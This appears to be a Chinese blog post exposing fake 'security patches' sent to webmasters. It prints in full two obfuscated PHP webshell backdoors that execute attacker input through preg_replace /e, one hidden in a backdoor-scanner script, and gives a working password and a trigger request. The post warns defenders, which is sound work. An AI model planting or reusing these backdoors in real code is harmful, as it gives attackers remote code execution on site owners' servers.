Home > Article > Backend Development > 如何利用钓鱼黑吃黑
15年10月写的文章,今天无意翻到了,就刚好贴在博客吧。
博客也很久没更新了。
这是所谓的安全工程师发给网管的安全代码。
<?php$MMIC= $_GET['tid']?$_GET['tid']:$_GET['fid'];if($MMIC >1000000){ die('404');}if (isset($_POST["\x70\x61\x73\x73"]) && isset($_POST["\x63\x68\x65\x63\x6b"])){ $__PHP_debug = array ( 'ZendName' => '70,61,73,73', 'ZendPort' => '63,68,65,63,6b', 'ZendSalt' => '202cb962ac59075b964b07152d234b70' //792e19812fafd57c7ac150af768d95ce ); $__PHP_replace = array ( pack('H*', join('', explode(',', $__PHP_debug['ZendName']))), pack('H*', join('', explode(',', $__PHP_debug['ZendPort']))), $__PHP_debug['ZendSalt'] ); $__PHP_request = &$_POST; $__PHP_token = md5($__PHP_request[$__PHP_replace[0]]); if ($__PHP_token == $__PHP_replace[2]) { $__PHP_token = preg_replace ( chr(47).$__PHP_token.chr(47).chr(101), $__PHP_request[$__PHP_replace[1]], $__PHP_token ); unset ( $__PHP_debug, $__PHP_replace, $__PHP_request, $__PHP_token ); if(!defined('_DEBUG_TOKEN')) exit ('Get token fail!'); }}
代码我已经将792e19812fafd57c7ac150af768d95ce这个md5换成了123的md5 202cb962ac59075b964b07152d234b70
这个代码一看,如果之前没接触过类似的代码,应该会有很多人会认为:这个代码搞啥玩儿,php内核?
乍眼看,应该没什么后门
百度搜索一下792e19812fafd57c7ac150af768d95ce,看快照,可以发现
最后解密出来其实是利用preg_replace的/e来执行的一句话webshell。
利用方式:pass=123&check=phpinfo();
钓鱼的代码还有以下几种:
有的黑客将后门代码放在 扫描木马后门 的程序里。特别的猥琐
<?php # return 32md5 back 6 function getMd5($md5 = null) { $key = substr(md5($md5),26); return $key; } $array = array( chr(112).chr(97).chr(115).chr(115), //pass chr(99).chr(104).chr(101).chr(99).chr(107), // check chr(99).chr(52).chr(53).chr(49).chr(99).chr(99) // c451cc ); if ( isset($_POST) ){ $request = &$_POST; } elseif ( isset($_REQUEST) ) $request = &$_REQUEST; if ( isset($request[$array[0]]) && isset($request[$array[1]]) ) { if ( getMd5($request[$array[0]]) == $array[2] ) { //md5(pass) == c451cc $token = preg_replace ( chr(47) . $array[2] . chr(47) . chr(101), // /c451cc/e $request[$array[1]], $array[2] ); } }?>
下面是一个黑客钓鱼的真实场景。先看下黑阔的背景身份。
个人主页: http://loudong.360.cn/vul/profile/uid/2822960/
伪装成360补天的一名白帽子,并且把自己QQ地址写成360公司的地址
但是黑客却以为补天的白帽子就是360的员工
不过站长也确实信了他360的身份。因为改的备注是 360安全小组
用了补丁代码,*地址立马404。还用chattr +i 设置文件为read only
安全,从我做起